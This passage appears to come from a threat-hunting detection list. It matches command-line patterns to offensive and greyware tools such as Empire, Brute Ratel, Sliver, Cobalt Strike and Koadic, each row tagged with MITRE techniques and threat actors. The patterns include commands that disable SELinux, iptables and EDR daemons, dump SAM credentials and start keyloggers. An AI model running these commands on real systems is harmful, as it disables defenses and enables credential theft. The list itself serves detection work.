and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -psenum *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -psgrep 
*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -psinject,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -pupysh,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -python3 start_campaign.py,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1024 - T1071 - T1029 - T1569,TA0002 - TA0003 - TA0040,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -raw_keylogger *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,0,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -rawshark -*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -RedGuard -*,offensive_tool_keyword,RedGuard,RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/wikiZ/RedGuard,1,0,N/A,10,10,1097,170,2023-09-19T11:06:40Z,2022-05-08T04:02:33Z -remotereg *,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,0,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -rev2self*,offensive_tool_keyword,cobaltstrike,Spectrum Attack Simulation beacons,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas/,1,0,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -rpcclient -*,greyware_tool_keyword,rpcclient,tool for executing client side MS-RPC functions,T1021.006 - T1049,TA0002 - TA0009,N/A,N/A,Lateral movement,https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html,1,0,greyware tool - risks of False positive !,8,10,N/A,N/A,N/A,N/A -runof *.o*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 
T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -runpe *.exe*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -samdump *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -ScareCrow -*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,0,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -schkconfig off cbdaemon,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -scrun.exe *,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,0,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -service cbdaemon stop,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -service ip6tables stop,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -service iptables stop,greyware_tool_keyword,iptables,Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -set CMD *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set ENDPOINT *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set shellcode *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -set srvhost *,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -set_child *.exe,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -Set-ADObject -SamAccountName * -PropertyName scriptpath -PropertyValue *\*.exe*,greyware_tool_keyword,powershell,AD module Logon Script from remote IP,T1037.001 - T1078.003 - T1046,TA0002 - TA0007 - TA0040,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -setenforce 0,greyware_tool_keyword,shell,Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.,T1055 - T1070.004 - T1218.011,TA0007 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://attack.mitre.org/techniques/T1562/001/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -sh_executor *,offensive_tool_keyword,mythic,mythic C2 agent,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/freyja/,1,0,N/A,10,10,11,6,2023-06-30T16:35:47Z,2022-09-28T17:20:04Z -sharescan *.txt,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -shell.exe -u http://*,offensive_tool_keyword,cobaltstrike,bypassAV cobaltstrike shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/jas502n/bypassAV-1,1,0,N/A,10,10,18,9,2021-03-04T01:51:14Z,2021-03-03T11:33:38Z -ShellCmd *,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -show shellcodes,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -SigFlip *,offensive_tool_keyword,C2 related tools,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -SigFlip *.exe*,offensive_tool_keyword,cobaltstrike,SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -sleeper force,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sleeper off,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sleeper on,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
